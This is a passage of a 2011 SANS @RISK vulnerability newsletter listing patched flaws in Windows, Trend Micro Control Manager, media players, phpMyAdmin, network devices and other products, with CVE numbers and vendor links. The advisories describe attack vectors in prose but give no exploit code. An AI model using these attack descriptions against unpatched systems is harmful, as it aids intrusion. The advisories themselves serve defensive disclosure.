&lt;span class="apple-style-span"&gt;Network Device &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;5&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;span style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; -webkit-text-decorations-in-effect: none; -webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; orphans: 2; widows: 2; word-spacing: 0px;"&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;/span&gt;*************************************************************************&lt;br /&gt;
Part I -- Critical Vulnerabilities from TippingPoint (&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.tippingpoint.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.tippingpoint.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;)&lt;br /&gt;
Widely Deployed Software&lt;br /&gt;
(1) HIGH: Microsoft Windows Bluetooth Stack overflow&lt;br /&gt;
(2) MEDIUM: Trend Micro Control Manager Multiple Vulnerabilities&lt;br /&gt;
&lt;br /&gt;
****************************************************************************&lt;br /&gt;
&lt;br /&gt;
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys&lt;br /&gt;
(&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;-- Windows&lt;/b&gt;&lt;br /&gt;
11.29.1&amp;nbsp; - Microsoft Windows Bluetooth Stack Remote Code Execution&lt;br /&gt;
11.29.2&amp;nbsp; - Microsoft Windows CSRSS Multiple Local Privilege Escalation Vulnerabilities&lt;br /&gt;
11.29.3&amp;nbsp; - Microsoft Windows Kernel "Win32k.sys" Multiple Vulnerabilities&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;-- Third Party Windows Apps&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;11.29.4&amp;nbsp; - ESTsoft ALPlayer ".asx" File Buffer Overflow&lt;br /&gt;
11.29.5&amp;nbsp; - Chilkat Crypt ActiveX Control "SaveDecrypted()" Insecure Method Vulnerability&lt;br /&gt;
11.29.6&amp;nbsp; - ZipWiz 2005 ".zip" File Buffer Overflow&lt;br /&gt;
11.29.7&amp;nbsp; - Effective File Search (EFS) DLL Loading Arbitrary Code Execution&lt;br /&gt;
11.29.8&amp;nbsp; - ZipItFree ".zip" File Buffer Overflow&lt;br /&gt;
11.29.9&amp;nbsp; - Trend Micro Control Manager "CASProcessor.exe" BLOB Remote Code Execution&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;-- Linux&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;11.29.10 - Debian an d Ubuntu foo2zjs Insecure Temporary File Creation Vulnerability&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;-- HP-UX&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;11.29.11 - HP-UX Dynamic Loader Unspecified Local Privilege Escalation&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;-- Cross Platform&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;11.29.12 - Apache XML Security for C++ Signature Key Parsing Denial of Service&lt;br /&gt;
11.29.13 - libpng PNG File Denial of Service&lt;br /&gt;
11.29.14 - Opera Web Browser Multiple Security Weaknesses&lt;br /&gt;
11.29.15 - IBM WebSphere MQ CDP Extension Revoked SSL Certificate Validation Security Bypass Vulnerability&lt;br /&gt;
11.29.16 - libsndfile PAF File Integer Overflow&lt;br /&gt;
11.29.17 - libvte9 "vte_sequence_handler_multiple()" Function Remote Denial of Service&lt;br /&gt;
11.29.18 - SAP MaxDB NULL Pointer Dereference Denial of Service&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;-- Web Application&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;11.29.19 - phpMyAdmin Multiple Remote Vulnerabilities&lt;br /&gt;
11.29.20 - DotNetNuke Multiple Security Bypass Vulnerabilities&lt;br /&gt;
11.29.21 - Ferdows CMS Cross-Site Scripting and Multiple SQL Injection Vulnerabilities&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;-- Network Device&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;11.29.22 - Cisco Content Services Gateway Malformed ICMP Messages Denial of Service&lt;br /&gt;
11.29.23 - D-Link DSL-2650U Remote Denial of Service&lt;br /&gt;
11.29.24 - Aruba Networks ArubaOS HTTP Response Splitting and HTML Injection Vulnerabilities&lt;br /&gt;
11.29.25 - Ingate Firewall and SIParator SIP Module Remote Denial of Service&lt;br /&gt;
11.29.26 - Symantec Web Gateway Management GUI SQL Injection Vulnerability&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
PART I Critical Vulnerabilities&lt;br /&gt;
Part I for this issue has been compiled by Josh Bronson at TippingPoint,&lt;br /&gt;
a division of HP, as a by-product of that company's continuous effort&lt;br /&gt;
to ensure that its intrusion prevention products effectively block&lt;br /&gt;
exploits using known vulnerabilities. TippingPoint's analysis is&lt;br /&gt;
complemented by input from a council of security managers from twelve&lt;br /&gt;
large organizations who confidentially share with SANS the specific&lt;br /&gt;
actions they have taken to protect their systems. A detailed description&lt;br /&gt;
of the process may be found at&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.sans.org/newsletters/risk/#process"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.sans.org/newsletters/risk/#process&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
(1) HIGH: Microsoft Windows Bluetooth Stack overflow&lt;br /&gt;
Affected:&lt;br /&gt;
Windows Vista Service Pack 1,2&lt;br /&gt;
Windows Vista x64 Edition Service Pack 1,2&lt;br /&gt;
Windows 7 for 32-bit Systems&lt;br /&gt;
Windows 7 for 32-bit Systems Service Pack 1&lt;br /&gt;
&lt;br /&gt;
Description: Microsoft has released a patch addressing a security&lt;br /&gt;
vulnerability in its Bluetooth driver code. By sending malicious&lt;br /&gt;
Bluetooth packets, an attacker can cause the driver code to access&lt;br /&gt;
uninitialized or deleted objects and then execute arbitrary code on a&lt;br /&gt;
target's machine with SYSTEM-level privileges. This vulnerability&lt;br /&gt;
requires the Bluetooth driver to be enabled.&lt;br /&gt;
&lt;br /&gt;
Status: vendor confirmed, updates available&lt;br /&gt;
&lt;br /&gt;
References:&lt;br /&gt;
Vendor Site&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.microsoft.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
Microsoft Security Bulletin&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS11-053.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/Bulletin/MS11-053.mspx&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
SecurityFocus BugTraq IDs&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48617/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48617/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
(2) MEDIUM: Trend Micro Control Manager Multiple Vulnerabilities&lt;br /&gt;
Affected:&lt;br /&gt;
Trend Micros Control Manager 5.0 and 5.5&lt;br /&gt;
&lt;br /&gt;
Description: Trend Micro has released a patch for Control Manager, its&lt;br /&gt;
web-based security management console, addressing two vulnerabilities.&lt;br /&gt;
The first vulnerabilities involves the CASProcessor.exe process, which&lt;br /&gt;
listens on port 20801 by default. By sending a malicious request, an&lt;br /&gt;
attacker can exploit an integer overflow vulnerability in order to&lt;br /&gt;
execute arbitrary code with SYSTEM-level privileges. The second involves&lt;br /&gt;
the Cas_LogDirectInsert.aspx http handler, which listens for HTTPS&lt;br /&gt;
messages on port 443. By sending a POST request with malicious&lt;br /&gt;
information, an attacker can inject commands used to query the backend&lt;br /&gt;
database and create a new account. Using this account and the management&lt;br /&gt;
console, they can then execute arbitrary commands on the target machine.&lt;br /&gt;
&lt;br /&gt;
Status: vendor confirmed, updates available&lt;br /&gt;
&lt;br /&gt;
References:&lt;br /&gt;
Vendor Site&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.trendmicro.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.trendmicro.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
Vendor Advisory&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://esupport.trendmicro.com/solution/en-us/1058292.aspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://esupport.trendmicro.com/solution/en-us/1058292.aspx&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
Zero Day Initiative Advisories&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-234/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-234/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.zerodayinitiative.com/advisories/ZDI-11-235/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.zerodayinitiative.com/advisories/ZDI-11-235/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
SecurityFocus BugTraq IDs&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48638"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48638&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48652"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48652&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from&lt;br /&gt;
Qualys (&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;)&lt;br /&gt;
&lt;br /&gt;
This list is compiled by Qualys ( &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt; ) as part of that&lt;br /&gt;
company's ongoing effort to ensure its vulnerability management web&lt;br /&gt;
service tests for all known vulnerabilities that can be scanned. As of&lt;br /&gt;
this week Qualys scans for 11686 unique vulnerabilities. For this&lt;br /&gt;
special SANS community listing, Qualys also includes vulnerabilities&lt;br /&gt;
that cannot be scanned remotely.&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.1 CVE: CVE-2011-1265&lt;br /&gt;
Platform: Windows&lt;br /&gt;
Title: Microsoft Windows Bluetooth Stack Remote Code Execution&lt;br /&gt;
Description: Bluetooth is an industry standard protocol that enables&lt;br /&gt;
wireless connectivity for computers and other devices. The application is&lt;br /&gt;
exposed to a remote code execution issue because the Bluetooth stack fails&lt;br /&gt;
to adequately handle specially crafted Bluetooth packets. The issue affects&lt;br /&gt;
the "bthport.sys" driver. Windows Vista SP1 and SP2, Windows 7 and Windows 7&lt;br /&gt;
SP1 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS11-053.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/Bulletin/MS11-053.mspx&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.2 CVE: CVE-2011-1281, CVE-2011-1282, CVE-2011-1283,&lt;br /&gt;
CVE-2011-1284, CVE-2011-1870&lt;br /&gt;
Platform: Windows&lt;br /&gt;
Title: Microsoft Windows CSRSS Multiple Local Privilege Escalation&lt;br /&gt;
Vulnerabilities&lt;br /&gt;
Description: Multiple local privilege&lt;br /&gt;
escalation issues affect the Microsoft Windows Client/Server Runtime&lt;br /&gt;
Subsystem (CSRSS) because it fails to sufficiently allocate memory&lt;br /&gt;
when dealing with specific user transactions. Windows XP SP3 and x64&lt;br /&gt;
SP2, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server&lt;br /&gt;
2008 and Server 2008 SP2, Windows 7 and Windows 7 SP1, Windows Server&lt;br /&gt;
2008 R2 x64 and x64 SP1 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS11-056.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/MS11-056.mspx&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.3 CVE: CVE-2011-1874, CVE-2011-1875, CVE-2011-1876,&lt;br /&gt;
CVE-2011-1877, CVE-2011-1878, CVE-2011-1879, CVE-2011-1880,&lt;br /&gt;
CVE-2011-1881, CVE-2011-1882, CVE-2011-1883, CVE-2011-1884,&lt;br /&gt;
CVE-2011-1885, CVE-2011-1886, CVE-2011-1887, CVE-2011-1888&lt;br /&gt;
Platform: Windows&lt;br /&gt;
Title: Microsoft Windows Kernel "Win32k.sys" Multiple Vulnerabilities&lt;br /&gt;
Description: Microsoft Windows is exposed to multiple security issues&lt;br /&gt;
that occur in the Windows kernel "Win32k.sys" kernel mode device driver.&lt;br /&gt;
Multiple local privilege escalation issues are caused by a NULL pointer&lt;br /&gt;
dereference error that occurs due to a failure to properly manage&lt;br /&gt;
pointers to certain kernel driver objects. Multiple local privilege&lt;br /&gt;
escalation issues occur because an use-after-free error occurs due to&lt;br /&gt;
improper driver object management. A local information disclosure issue&lt;br /&gt;
occurs because it fails to properly validate certain function&lt;br /&gt;
parameters. Windows XP SP3 and x64 SP2, Windows Server 2003 SP2, Windows&lt;br /&gt;
Vista SP1 and SP2, Windows Server 2008 and Server 2008 SP2, Windows 7&lt;br /&gt;
and Windows 7 SP1, Windows Server 2008&amp;nbsp; R2 x64 and x64 SP1 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS11-054.mspx"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.microsoft.com/technet/security/bulletin/MS11-054.mspx&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.4 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: ESTsoft ALPlayer ".asx" File Buffer Overflow&lt;br /&gt;
Description: ALPlayer is a media player available for Microsoft&lt;br /&gt;
Windows. ALPlayer is exposed to a stack-based buffer overflow issue&lt;br /&gt;
because it fails to perform adequate boundary checks on user-supplied&lt;br /&gt;
input. Specifically, this issue occurs when opening a specially&lt;br /&gt;
crafted ".asx" playlist file. ALPlayer 2.0 is vulnerable and other&lt;br /&gt;
versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48583/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48583/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.5 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Chilkat Crypt ActiveX Control "SaveDecrypted()" Insecure Method&lt;br /&gt;
Vulnerability&lt;br /&gt;
Description: Chikat Crypt ActiveX control is used to encrypt, hash,&lt;br /&gt;
and sign data. The application is exposed to an issue caused by an&lt;br /&gt;
insecure method that lets attackers overwrite files with arbitrary,&lt;br /&gt;
attacker-controlled content. This issue occurs in the&lt;br /&gt;
"SaveDecrypted()" method of the "ChilkatCrypt2.dll" ActiveX control.&lt;br /&gt;
aTube Catcher version 2.3.570 is vulnerable and other versions may also&lt;br /&gt;
be affected.&lt;br /&gt;
